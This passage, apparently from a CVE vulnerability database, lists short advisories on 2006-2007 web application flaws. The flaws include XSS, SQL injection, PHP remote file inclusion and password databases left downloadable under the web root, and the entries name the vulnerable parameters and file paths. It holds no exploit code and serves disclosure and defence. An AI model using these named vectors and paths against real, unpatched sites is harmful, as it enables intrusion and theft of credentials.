to inject arbitrary web script or HTML via the iid parameter. [CVE-2007-0265] Multiple cross-site scripting (XSS) vulnerabilities in Ezboxx Portal System Beta 0.7.6 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the pic parameter to custom/piczoom.asp, (2) the nocatname parameter to boxx/user-upload.asp, or (3) the iid parameter to indexes/newscomments.asp. [CVE-2007-0258] Cross-site scripting (XSS) vulnerability in index.php in (1) Fastilo 2.0 and (2) Open Solution Quick.Cart 2.0 allows remote attackers to inject arbitrary web script or HTML via the p parameter. NOTE: some of these details are obtained from third party information. [CVE-2007-0249] Cross-site scripting (XSS) vulnerability in index.php in Nwom topsites 3.0 allows remote attackers to inject arbitrary web script or HTML via the o parameter. [CVE-2007-0246] plugins/scmcvs/www/cvsweb.php in the CVSWeb CGI in GForge 4.5.16 before 20070524, aka gforge-plugin-scmcvs, allows remote attackers to execute arbitrary commands via shell metacharacters in the PATH_INFO. [CVE-2007-0240] Cross-site scripting (XSS) vulnerability in Zope 2.10.2 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors in a HTTP GET request. [CVE-2007-0231] Cross-site scripting (XSS) vulnerability in Movable Type (MT) 3.33, when nofollow is disabled and unmoderated comments are enabled, allows remote attackers to inject arbitrary web script or HTML via the Comments field. [CVE-2007-0225] Cross-site scripting (XSS) vulnerability in shopcustadmin.asp in VP-ASP Shopping Cart 6.09 and earlier allows remote attackers to inject arbitrary web script or HTML via the msg parameter. [CVE-2007-0220] Cross-site scripting (XSS) vulnerability in Outlook Web Access (OWA) in Microsoft Exchange Server 2000 SP3, and 2003 SP1 and SP2 allows remote attackers to execute arbitrary scripts, spoof content, or obtain sensitive information via certain UTF-encoded, script-based e-mail attachments, involving an "incorrectly handled UTF character set label". [CVE-2007-0204] Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin before 2.9.2-rc1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: some of these details are obtained from third party information. [CVE-2007-0196] SQL injection vulnerability in admin_check_user.asp in Motionborg Web Real Estate 2.1 and earlier allows remote attackers to execute arbitrary SQL commands via the username field (txtUserName parameter) and possibly other parameters. NOTE: some details were obtained from third party information. [CVE-2007-0191] Cross-site scripting (XSS) vulnerability in admin.php in MKPortal allows remote attackers to inject arbitrary web script or HTML via two certain fields in a contents_new operation in the ad_contents section. [CVE-2007-0186] Multiple cross-site scripting (XSS) vulnerabilities in F5 FirePass SSL VPN allow remote attackers to inject arbitrary web script or HTML via (1) the xcho parameter to my.logon.php3 [CVE-2007-0185] Getahead Direct Web Remoting (DWR) before 1.1.4 allows attackers to cause a denial of service (memory exhaustion and servlet outage) via unknown vectors related to a large number of calls in a batch. [CVE-2007-0184] Getahead Direct Web Remoting (DWR) before 1.1.4 allows attackers to obtain unauthorized access to public methods via a crafted request that bypasses the include/exclude checks. [CVE-2007-0183] Cross-site scripting (XSS) vulnerability in /search in iPlanet Web Server 4.x allows remote attackers to inject arbitrary web script or HTML via the NS-max-records parameter. NOTE: The provenance of this information is unknown [CVE-2007-0182] Multiple PHP remote file inclusion vulnerabilities in magic photo storage website allow remote attackers to execute arbitrary PHP code via a URL in the _config[site_path] parameter to (1) admin_password.php, (2) add_welcome_text.php, (3) admin_email.php, (4) add_templates.php, (5) admin_paypal_email.php, (6) approve_member.php, (7) delete_member.php, (8) index.php, (9) list_members.php, (10) membership_pricing.php, or (11) send_email.php in admin/ [CVE-2007-0181] PHP remote file inclusion vulnerability in include/common_function.php in magic photo storage website allows remote attackers to execute arbitrary PHP code via a URL in the _config[site_path] parameter. [CVE-2007-0177] Cross-site scripting (XSS) vulnerability in the AJAX module in MediaWiki before 1.6.9, 1.7 before 1.7.2, 1.8 before 1.8.3, and 1.9 before 1.9.0rc2, when wgUseAjax is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-0176] Cross-site scripting (XSS) vulnerability in search/advanced_search.php in GForge 4.5.11 allows remote attackers to inject arbitrary web script or HTML via the words parameter. [CVE-2007-0175] Cross-site scripting (XSS) vulnerability in htsrv/login.php in b2evolution 1.8.6 allows remote attackers to inject arbitrary web script or HTML via scriptable attributes in the redirect_to parameter. [CVE-2007-0156] M-Core stores the database under the web document root, which allows remote attackers to obtain sensitive information via a direct request to db/uyelik.mdb. [CVE-2007-0155] HarikaOnline 2.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing passwords via a direct request for harikaonline.mdb. [CVE-2007-0154] Webulas stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing passwords via a direct request for db/db.mdb. [CVE-2007-0153] AJLogin 3.5 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing passwords via a direct request for ajlogin.mdb. [CVE-2007-0152] OhhASP stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing passwords via a direct request for db/OhhASP.mdb. [CVE-2007-0151] MitiSoft stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing passwords via a direct request for access_MS/MitiSoft.mdb. [CVE-2007-0149] EMembersPro 1.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing passwords via a direct request for users.mdb. [CVE-2007-0148] Format string vulnerability in OmniGroup OmniWeb 5.5.1 allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via format string specifiers in the Javascript alert function. [CVE-2007-0147] Cuyahoga before 1.0.1 installs the FCKEditor component with an incorrect deny statement in a Web.config file, which allows remote attackers to upload files when these privileges were intended only for the Administrator and Editor roles. [CVE-2007-0146] Multiple cross-site scripting (XSS) vulnerabilities in Fix and Chips CMS 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter in (a) delete-announce.php [CVE-2007-0144] Cross-site scripting (XSS) vulnerability in search.asp in Digitizing Quote And Ordering System 1.0 allows remote authenticated attackers to inject arbitrary web script or HTML via the ordernum parameter. [CVE-2007-0141] Cross-site scripting (XSS) vulnerability in yald.php in Yet Another Link Directory 1.0 allows remote attackers to inject arbitrary web script or HTML via the search parameter. [CVE-2007-0136] Multiple cross-site scripting (XSS) vulnerabilities in Drupal before 4.6.11, and 4.7 before 4.7.5, allow remote attackers to inject arbitrary web script or HTML via unspecified parameters in the (1) filter and (2) system modules. NOTE: some of these details are obtained from third party information. [CVE-2007-0121] Cross-site scripting (XSS) vulnerability in search.asp in RI Blog 1.3 allows remote attackers to inject arbitrary web script or HTML via the q parameter. [CVE-2007-0120] Acunetix Web Vulnerability Scanner (WVS) 4.0 Build 20060717 and earlier allows remote attackers to cause a denial of service (application crash) via multiple HTTP requests containing invalid Content-Length values. [CVE-2007-0119] Multiple cross-site scripting (XSS) vulnerabilities in EditTag 1.2 allow remote attackers to inject arbitrary web script or HTML via the plain parameter to (1) mkpw_mp.cgi, (2) mkpw.pl, or (3) mkpw.cgi. [CVE-2007-0116] Digger Solutions Intranet Open Source (IOS) stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing passwords via a direct request for data/intranet.mdb. [CVE-2007-0110] Cross-site scripting (XSS) vulnerability in nidp/idff/sso in Novell Access Manager Identity Server before 3.0.0-1013 allows remote attackers to inject arbitrary web script or HTML via the IssueInstant parameter, which is not properly handled in the resulting error message. [CVE-2007-0106] Cross-site scripting (XSS) vulnerability in the CSRF protection scheme in WordPress before 2.0.6 allows remote attackers to inject arbitrary web script or HTML via a CSRF attack with an invalid token and quote characters or HTML tags in URL variable names, which are not properly handled when WordPress generates a new link to verify the request. [CVE-2007-0096] CarbonCommunities stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing passwords via a direct request for DataBase/Carbon2.4d.mdb. [CVE-2007-0094] Sven Moderow GuestBook 0.3a stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing passwords via a direct request for (1) gbook97.mdb or (2) gbook.mdb in ~db/. [CVE-2007-0093] SQL injection vulnerability in page.php in Simple Web Content Management System allows remote attackers to execute arbitrary SQL commands via the id parameter. [CVE-2007-0091] newsCMSlite stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing passwords via a direct request for newsCMS.mdb. [CVE-2007-0090] WineGlass stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing passwords via a direct request for db/data.mdb. [CVE-2007-0089] jgbbs stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing passwords via a direct request for db/bbs.mdb. [CVE-2007-0083] Cross-site scripting (XSS) vulnerability in Nuked Klan 1.7 and earlier allows remote attackers to inject arbitrary web script or HTML via a javascript: URI in a getURL statement in a .swf file, as demonstrated by "Remote Cookie Disclosure." NOTE: it could be argued that this is an issue in Shockwave instead of Nuked Klan. [CVE-2007-0079] rblog stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for (1) data/admin.mdb or (2) data/rblog.mdb. [CVE-2007-0078] BattleBlog stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for database/blankmaster.mdb. [CVE-2007-0077] lblog stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for a certain file in admin/db/newFolder/. [CVE-2007-0076] Openforum stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing user passwords via a direct request for openforum.mdb. [CVE-2007-0075] AspBB stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing user passwords via a direct request for db/aspbb.mdb. [CVE-2007-0067] Unspecified vulnerability in the Lotus Domino Web Server 6.0, 6.5.x before 6.5.6, and 7.0.x before 7.0.3 allows remote attackers to cause a denial of service (daemon crash) via requests for URLs that reference certain files. [CVE-2007-0056] Multiple cross-site scripting (XSS) vulnerabilities in AShop Deluxe 4.5 and AShop Administration Panel allow remote attackers to inject arbitrary web script or HTML via the (1) cat parameter to (a) ashop/catalogue.php and (b) ashop/basket.php, the (2) exp parameter to ashop/catalogue.php, the (3) searchstring parameter to (c) ashop/search.php, the (4) checkout and (5) action parameters to (d) ashop/shipping.php, the cat parameter to (f) cart-path/admin/editcatalogue.php, and the (7) resultpage parameter to (g) cart-path/admin/salesadmin.php. [CVE-2007-0054] Cross-site scripting (XSS) vulnerability in gbrowse.php in Belchior Foundry vCard PRO allows remote attackers to inject arbitrary web script or HTML via the sortby parameter. [CVE-2007-0044] Adobe Acrobat Reader Plugin before 8.0.0 for the Firefox, Internet Explorer, and Opera web browsers allows remote attackers to force the browser to make unauthorized requests to other web sites via a URL in the (1) FDF, (2) xml, and (3) xfdf AJAX request parameters, following the # (hash) character, aka "Universal CSRF and session riding." [CVE-2007-0024] Integer overflow in the Vector Markup Language (VML) implementation (vgx.dll) in Microsoft Internet Explorer 5.01, 6, and 7 on Windows 2000 SP4, XP SP2, Server 2003, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a crafted web page that contains unspecified integer properties that cause insufficient memory allocation and trigger a buffer overflow, aka the "VML Buffer Overrun Vulnerability." [CVE-2006-7247] SQL injection vulnerability in the Weblinks (com_weblinks) component for Joomla! and Mambo 1.0.9 and earlier allows remote attackers to execute arbitrary SQL commands via the title parameter. [CVE-2006-7238] Cross-site scripting (XSS) vulnerability in MyShoutPro before 1.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2006-7233] Cross-site scripting (XSS) vulnerability in the login form (login.jsp) of the admin console in Openfire (formerly Wildfire) 2.6.0, and possibly other versions before 3.5.3, allows remote attackers to inject arbitrary web script or HTML via the url parameter. [CVE-2006-7209] Multiple cross-site scripting (XSS) vulnerabilities in phpTrafficA before 1.2beta2 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors related to keywords results in the (1) main, (2) daily, (3) weekly, (4) monthly, (5) new trends, (6) individual page, and (7) search engine statistics. [CVE-2006-7200] EMC RSA Security SiteKey issues challenge-bypass tokens that persist forever without a cancellation interface for end users, which makes it easier for attackers to bypass one stage of authentication by stealing and replaying a token. [CVE-2006-7199] EMC RSA Security SiteKey allows remote attackers to display the correct image via a man-in-the-middle (MITM) attack in which an attacker-controlled server proxies authentication data to and from a legitimate SiteKey server. NOTE: the vendor disputes the severity of the issue, stating that it is easier to monitor this attack than "attacks against static web pages." [CVE-2006-7198] Unspecified vulnerability in IBM WebSphere Application Server (WAS) before 5.1.1.14, and WAS for z/OS 601 before 6.0.2.13, has unknown impact and attack vectors, related to a "Potential security exposure," aka PK26123. [CVE-2006-7196] Cross-site scripting (XSS) vulnerability in the calendar application example in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.15 allows remote attackers to inject arbitrary web script or HTML via the time parameter to cal2.jsp and possibly unspecified other vectors. NOTE: this may be related to CVE-2006-0254.1. [CVE-2006-7195] Cross-site scripting (XSS) vulnerability in implicit-objects.jsp in Apache Tomcat 5.0.0 through 5.0.30 and 5.5.0 through 5.5.17 allows remote attackers to inject arbitrary web script or HTML via certain header values. [CVE-2006-7190] Cross-site scripting (XSS) vulnerability in cgi-bin/user-lib/topics.pl in web-app.net WebAPP before 20060515 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors in the viewnews function, related to use of doubbctopic instead of doubbc. [CVE-2006-7189] Cross-site scripting (XSS) vulnerability in cgi-bin/admin/logs.cgi in web-app.net WebAPP before 20060403 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to the Statistics Log Viewer. [CVE-2006-7188] The search function in cgi-lib/user-lib/search.pl in web-app.net WebAPP before 20060909 allows remote attackers to read internal forum posts via certain requests, possibly related to the $info{'forum'} variable. [CVE-2006-7187] Cross-site scripting (XSS) vulnerability in the show_recent_searches function in cgi-lib/user-lib/search.pl in web-app.net WebAPP before 20060909 allows remote attackers to inject arbitrary web script or HTML via the srch variable. [CVE-2006-7186] cgi-lib/subs.pl in web-app.net WebAPP before 0.9.9.3.5 allows attackers to open list files in "profile and other functions," a different vulnerability than CVE-2005-0927. [CVE-2006-7166] IBM WebSphere Application Server (WAS) 5.1.1.9 and earlier allows remote attackers to obtain JSP source code and other sensitive information via "a specific JSP URL." [CVE-2006-7165] IBM WebSphere Application Server (WAS) 5.0 through 5.1.1.0 allows remote attackers to obtain JSP source code and other sensitive information via certain "special URIs." [CVE-2006-7164] SimpleFileServlet in IBM WebSphere Application Server 5.0.1 through 5.0.2.7 on Linux and UNIX does not block certain invalid URIs and does not issue a security challenge, which allows remote attackers to read secure files and obtain sensitive information via certain requests. [CVE-2006-7158] Cross-site scripting (XSS) vulnerability in Oracle Application Express (APEX) before 2.2.1, aka Oracle HTML DB, allows remote attackers to inject arbitrary web script or HTML via the NOTIFICATION_MSG parameter. NOTE: it is likely that this issue overlaps one of the identifiers in CVE-2006-5351. [CVE-2006-7149] Multiple cross-site scripting (XSS) vulnerabilities in Mambo 4.6.x allow remote attackers to inject arbitrary web script or HTML via (1) the query string to (a) index.php, which reflects the string in an error message from mod_login.php [CVE-2006-7143] Cross-site scripting (XSS) vulnerability in Call Center Software 0.93 and earlier allows remote attackers to inject arbitrary web script or HTML via the problem description field. [CVE-2006-7137] Cross-site scripting (XSS) vulnerability in TinyPortal before 0.8.6 allows remote attackers to inject arbitrary web script or HTML via the shoutbox. [CVE-2006-7131] PHP remote file inclusion vulnerability in extras/mt.php in Jinzora 2.6 allows remote attackers to execute arbitrary PHP code via the web_root parameter. [CVE-2006-7128] PHP remote file inclusion vulnerability in forum/forum.php JAF CMS 4.0 RC1 allows remote attackers to execute arbitrary PHP code via a URL in the website parameter. [CVE-2006-7125] Cross-site scripting (XSS) vulnerability in Joomla BSQ Sitestats 1.8.0 and 2.2.1 allows remote attackers to inject arbitrary web script or HTML via the HTTP Referer header, which is not properly handled when the administrator views site statistics. [CVE-2006-7122] Cross-site scripting (XSS) vulnerability in the IP Address Lookup functionality in BSQ Sitestats (component for Joomla) 1.8.0, and possibly other versions before 2.2.1, allows remote attackers to inject arbitrary web script and HTML via the ip parameter. [CVE-2006-7114] P-News 2.0 stores db/user.txt under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information such as usernames and password hashes via a direct request. NOTE: this might be the same issue as CVE-2006-6888. [CVE-2006-7107] PHP remote file inclusion vulnerability in upgrade.php in Coalescent Systems freePBX 2.1.3 allows remote attackers to execute arbitrary PHP code via a URL in the amp_conf[AMPWEBROOT] parameter. [CVE-2006-7093] Cross-site scripting (XSS) vulnerability in Mambo LaiThai 4.5.4 Security Patch 2 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2006-7078] Multiple cross-site scripting (XSS) vulnerabilities in Professional Home Page Tools Login Script, as of July 2006, allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) vorname, and (3) nachname parameters in the register script. NOTE: some details have been obtained from third party sources. [CVE-2006-7076] Cross-site scripting (XSS) vulnerability in guestbook.php in Advanced Guestbook 2.4 for phpBB allows remote attackers to inject arbitrary web script or HTML via the entry parameter. NOTE: this issue might be resultant from SQL injection. [CVE-2006-7073] Cross-site scripting (XSS) vulnerability in Opentools Attachment Mod before 2.4.5 allows remote attackers to inject arbitrary web script or HTML in Internet Explorer via unknown vectors related to the uploaded attachments form. NOTE: some details were obtained from third party information. [CVE-2006-7072] Cross-site scripting (XSS) vulnerability in GeoClassifieds Enterprise 2.0.5.2 and earlier allows remote attackers to inject arbitrary web script and HTML via the (1) b[username] and (2) c parameters to (a) index.php, the b[username] parameter to (b) admin/index.php, and (3) c[phone] parameter to register.php. [CVE-2006-7068] PHP remote file inclusion vulnerability in CliServ Web Community 0.65 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the cl_headers parameter to (1) menu.php3 and (2) login.php3. [CVE-2006-7064] Cross-site scripting (XSS) vulnerability in forum/admin.php for Invision Power Board (IPB) 2.1.6 and earlier allows remote attackers to inject arbitrary web script or HTML as the administrator via the phpinfo parameter. [CVE-2006-7061] Scriptsez.net E-Dating System stores data files with predictable names under the web document root with insufficient access control, which allows remote attackers to read private messages and leverage them for cross-site scripting (XSS) attacks. [CVE-2006-7059] Multiple cross-site scripting (XSS) vulnerabilities in Scriptsez.net E-Dating System allow remote attackers to inject arbitrary web script or HTML via encoded entities (&#0000039) in IMG tags to (1) messages, (2) profile fields, or (3) the id parameter in a dologin operation to cindex.php. [CVE-2006-7058] Multiple cross-site scripting (XSS) vulnerabilities in Sphider before 1.3.1c allow remote attackers to inject arbitrary web script or HTML via the catid parameter to (1) templates/standard/search_form.html and (2) templates/dark/search_form.html. NOTE: the provenance of this information is unknown [CVE-2006-7043] Multiple cross-site scripting (XSS) vulnerabilities in Chipmunk Blogger allow remote authenticated users to inject arbitrary web script or HTML via script tags in (1) posts and (2) profile names [CVE-2006-7042] Cross-site scripting (XSS) vulnerability in directory/index.php in Chipmunk directory allows remote attackers to inject arbitrary web script or HTML via the start parameter. [CVE-2006-7033] Cross-site scripting (XSS) vulnerability in Super Link Exchange Script 1.0 allows remote attackers to inject arbitrary web script or HTML via IMG tags in the search box. [CVE-2006-7023] Multiple cross-site scripting (XSS) vulnerabilities in fx-APP 0.0.8.1 allow remote attackers to inject arbitrary HTML or web script via (1) the search box, and the (2) url, (3) website, (4) comment, and (5) signature fields in the profile, and possibly (6) a menu item. [CVE-2006-7022] The Tools module in fx-APP 0.0.8.1 allows remote attackers to misrepresent the contents of a web page via an arbitrary URL in the url parameter to a showhtml action for index.php, which causes the URL to be displayed within an iframe. [CVE-2006-7017] Multiple PHP remote file inclusion vulnerabilities in Indexu 5.0.1 allow remote attackers to execute arbitrary PHP code via a URL in the admin_template_path parameter to admin/ scripts (1) app_change_email.php, (2) app_change_pwd.php, (3) app_mod_rewrite.php, (4) app_page_caching.php, (5) app_setup.php, (6) cat_add.php, (7) cat_delete.php, (8) cat_edit.php, (9) cat_path_update.php, (10) cat_search.php, (11) cat_struc.php, (12) cat_view.php, (13) cat_view_hidden.php, (14) cat_view_hierarchy.php, (15) cat_view_registered_only.php, (16) checkurl_web.php, (17) db_alter.php, (18) db_alter_change.php, (19) db_backup.php, (20) db_export.php, (21) db_import.php, (22) editor_add.php, (23) editor_delete.php, (24) editor_validate.php, (25) head.php, (26) index.php, (27) inv_config.php, (28) inv_config_payment.php, (29) inv_create.php, (30) inv_delete.php, (31) inv_edit.php, (32) inv_markpaid.php, (33) inv_markunpaid.php, (34) inv_overdue.php, (35) inv_paid.php, (36) inv_send.php, (37) inv_unpaid.php, (38) lang_modify.php, (39) link_add.php, (40) link_bad.php, (41) link_bad_delete.php, (42) link_checkurl.php, (43) link_delete.php, (44) link_duplicate.php, (45) link_edit.php, (46) link_premium_listing.php, (47) link_premium_sponsored.php, (48) link_search.php, (49) link_sponsored_listing.php, (50) link_validate.php, (51) link_validate_edit.php, (52) link_view.php, (53) log_search.php, (54) mail_modify.php, (55) menu.php, (56) message_create.php, (57) message_delete.php, (58) message_edit.php, (59) message_send.php, (60) message_subscriber.php, (61) message_view.php, (62) review_validate.php, (63) review_validate_edit.php, (64) summary.php, (65) template_active.php, (66) template_add_custom.php, (67) template_delete.php, (68) template_delete_file.php, (69) template_duplicate.php, (70) template_export.php, (71) template_import.php, (72) template_manager.php, (73) template_modify.php, (74) template_modify_file.php, (75) template_rename.php, (76) user_add.php, (77) user_delete.php, (78) user_edit.php, (79) user_search.php, and (80) whos.php. [CVE-2006-7004] Cross-site scripting (XSS) vulnerability in email_request.php in PSY Auction allows remote attackers to inject arbitrary web script or HTML via the user_id parameter. NOTE: the provenance of this information is unknown [CVE-2006-7002] Cross-site scripting (XSS) vulnerability in add_comment.php in Wheatblog (wB) 1.1 allows remote attackers to inject arbitrary web script or HTML via the Email field. NOTE: the provenance of this information is unknown [CVE-2006-6996] Multiple cross-site scripting (XSS) vulnerabilities in warforge.NEWS 1.0 allow remote attackers to inject arbitrary HTML and web script via the (1) title and (2) newspost parameters to (a) newsadd.php, and the (3) name, title, and (4) comment parameters to (b) news.php, a different set of vectors than CVE-2006-1818. NOTE: the provenance of this information is unknown [CVE-2006-6993] Multiple SQL injection vulnerabilities in pages/addcomment2.php in Neuron Blog 1.1 allow remote attackers to inject arbitrary SQL commands via the (1) commentname, (2) commentmail, (3) commentwebsite, and (4) comment parameters. NOTE: the provenance of this information is unknown [CVE-2006-6983] Cross-domain vulnerability in MYweb4net Browser 3.8.8.0 allows remote attackers to access restricted information from other domains via an object tag with a data parameter that references a link on the attacker's originating site that specifies a Location HTTP header that references the target site, which then makes that content available through the outerHTML attribute of the object, a similar vulnerability to CVE-2006-3280. [CVE-2006-6974] Headstart Solutions DeskPRO stores sensitive information under the web root with insufficient access control, which allows remote attackers to (1) list files in the includes/ directory [CVE-2006-6968] Cross-site scripting (XSS) vulnerability in the group moderation control center page in Phorum before 5.1.19 might allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2006-6961] WebRoot Spy Sweeper 4.5.9 and earlier does not detect malware based on file contents, which allows remote attackers to bypass malware detection by changing a file's name. [CVE-2006-6960] The Compression Sweep feature in WebRoot Spy Sweeper 4.5.9 and earlier does not handle non-ZIP archives, which allows remote attackers to bypass the malware detection via files with (1) RAR, (2) GZ, (3) TAR, (4) CAB, or (5) ACE compression. [CVE-2006-6959] WebRoot Spy Sweeper 4.5.9 and earlier allows local users to bypass the "Startup-Shield" security restrictions by modifying certain registry keys. [CVE-2006-6956] Microsoft Internet Explorer allows remote attackers to cause a denial of service (crash) via a web page that contains a large number of nested marquee tags, a related issue to CVE-2006-2723. [CVE-2006-6955] Opera allows remote attackers to cause a denial of service (application crash) via a web page that contains a large number of nested marquee tags, a related issue to CVE-2006-2723. [CVE-2006-6954] Flock beta 1 0.7 allows remote attackers to cause a denial of service (application crash) via a web page that contains a large number of nested marquee tags, a related issue to CVE-2006-2723. [CVE-2006-6951] Cross-site scripting (XSS) vulnerability in blog.php in OdysseusBlog allows remote attackers to inject arbitrary web script or HTML via the page parameter. [CVE-2006-6946] The web server in the NEC MultiWriter 1700C allows remote attackers to modify the device configuration via unspecified vectors. [CVE-2006-6942] Multiple cross-site scripting (XSS) vulnerabilities in PhpMyAdmin before 2.9.1.1 allow remote attackers to inject arbitrary HTML or web script via (1) a comment for a table name, as exploited through (a) db_operations.php, (2) the db parameter to (b) db_create.php, (3) the newname parameter to db_operations.php, the (4) query_history_latest, (5) query_history_latest_db, and (6) querydisplay_tab parameters to (c) querywindow.php, and (7) the pos parameter to (d) sql.php. [CVE-2006-6941] index.php in FreeWebshop 2.2.2 and earlier allows remote attackers to obtain sensitive information via an invalid action parameter in an info operation, which discloses the path in an error message. [CVE-2006-6936] Cross-site scripting (XSS) vulnerability in Xtreme ASP Photo Gallery allows remote attackers to inject arbitrary HTML or web script via (1) the catname parameter to displaypic.asp or (2) the search field. NOTE: vector 1 likely overlaps CVE-2006-3032. [CVE-2006-6934] Multiple cross-site scripting (XSS) vulnerabilities in Portix-PHP 0.4.2 allow remote attackers to inject arbitrary web script or HTML via the (1) titre or (2) auteur field in a forum post. [CVE-2006-6933] Easy Chat Server 2.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download certain files via direct requests to files such as (1) ServerKey.pem and (2) AcceptIP.txt. NOTE: The provenance of this information is unknown [CVE-2006-6929] Multiple cross-site scripting (XSS) vulnerabilities in Rapid Classified 3.1 allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to (a) reply.asp or (b) view_print.asp, the (2) SH1 parameter to (c) search.asp, the (3) name parameter to reply.asp, or the (4) dosearch parameter to (d) advsearch.asp. [CVE-2006-6928] Multiple cross-site scripting (XSS) vulnerabilities in Rialto 1.6 allow remote attackers to inject arbitrary web script or HTML via the (1) cat parameter to (a) listmain.asp or (b) searchmain.asp, the (2) the Keyword parameter to (c) searchkey.asp, or the (3) refno parameter to (d) forminfo.asp. [CVE-2006-6925] Multiple cross-site scripting (XSS) vulnerabilities in bitweaver 1.3.1 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the message title field when submitting an article to articles/edit.php, (2) the message title field when submitting a blog post to blogs/post.php, or (3) the message description field when editing in the Sandbox in wiki/edit.php. [CVE-2006-6920] Cross-site scripting (XSS) vulnerability in Nucleus before 3.24 allows remote attackers to inject arbitrary web script or HTML via unknown vectors, possibly involving (1) lib/ADMIN.php and (2) lib/SKIN.php. [CVE-2006-6916] Getahead Direct Web Remoting (DWR) before 1.1.3 allows attackers to cause a denial of service (infinite loop) via unknown vectors related to "crafted input." [CVE-2006-6899] hidd in BlueZ (bluez-utils) before 2.25 allows remote attackers to obtain control of the (1) Mouse and (2) Keyboard Human Interface Device (HID) via a certain configuration of two HID (PSM) endpoints, operating as a server, aka HidAttack. [CVE-2006-6892] Cross-site scripting (XSS) vulnerability in the GetLocation function in online.php in Jonathon J. Freeman OvBB 0.13a allows remote attackers to inject arbitrary web script or HTML via the aRequest variable. [CVE-2006-6891] Vz (Adp) Forum 2.0.3 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain the administrative account name and password hash via a direct request for users/admin.txt. [CVE-2006-6890] Voodoo chat 1.0RC1b stores sensitive information under the web root with insufficient access control, which allows remote attackers to download passwords via a direct request for data/users.dat. [CVE-2006-6889] FreeStyle Wiki (fswiki) 3.6.2 and earlier stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain passwords via a direct request for config/user.dat. [CVE-2006-6888] P-News 1.16 and 1.17 store sensitive information under the web root with insufficient access control, which allows remote attackers to obtain the administrative account name and password hash via a direct request for db/user.dat. [CVE-2006-6882] Cross-site scripting (XSS) vulnerability in golden book allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2006-6880] Multiple SQL injection vulnerabilities in code/guestadd.php in PHP-Update 2.7 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) newmessage, (2) newname, (3) newwebsite, or (4) newemail parameter. [CVE-2006-6874] Multiple cross-site scripting (XSS) vulnerabilities in friend.php in eNdonesia 8.4 allow remote attackers to inject arbitrary web script or HTML via the (1) Message or (2) Your Name field. NOTE: The provenance of this information is unknown [CVE-2006-6871] Multiple cross-site scripting (XSS) vulnerabilities in eNdonesia 8.4 allow remote attackers to inject arbitrary web script or HTML via (1) the mod parameter in a viewlink operation in mod.php, (2) the intypeid parameter in a showinfo operation in the informasi module in mod.php, (3) the "your Friend" field in friend.php, or (4) the "Main Text" field in admin.php. [CVE-2006-6868] Multiple cross-site scripting (XSS) vulnerabilities in Zen Cart Web Shopping Cart before 1.3.7 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2006-6866] STphp EasyNews PRO 4.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain usernames, email addresses, and password hashes via a direct request for data/users.txt. [CVE-2006-6862] Multiple cross-site scripting (XSS) vulnerabilities in Outfront Spooky Login 2.7 allow remote attackers to inject arbitrary web script or HTML via unspecified parameters to (1) login/login.asp or (2) login/register.asp. [CVE-2006-6860] Buffer overflow in the sendToMythTV function in MythControlServer.c in MythControl 1.0 and earlier allows remote attackers to execute arbitrary code via a crafted sendStr string to the Bluetooth interface. NOTE: some of these details are obtained from third party information. [CVE-2006-6859] SQL injection vulnerability in coupon_detail.asp in Website Designs For Less Click N' Print Coupons 2005.01 and earlier allows remote attackers to execute arbitrary SQL commands via the key parameter. [CVE-2006-6857] Cross-site scripting (XSS) vulnerability in modules/credits/credits.php in Docebo LMS allows remote attackers to inject arbitrary web script or HTML via the lang parameter. [CVE-2006-6856] Direct static code injection vulnerability in WebText CMS 0.4.5.2 and earlier allows remote attackers to inject arbitrary PHP code into a script in wt/users/ via the im parameter during a profile edit (edycja) operation, which is then executed via a direct request for this script. [CVE-2006-6855] AIDeX Mini-WebServer 1.1 early release 3 allows remote attackers to cause a denial of service (daemon crash) via a flood of HTTP GET requests, possibly related to display of HTTP log data by the GUI. NOTE: some of these details are obtained from third party information. [CVE-2006-6853] Buffer overflow in Durian Web Application Server 3.02 freeware on Windows allows remote attackers to execute arbitrary code via a long string in a crafted packet to TCP port 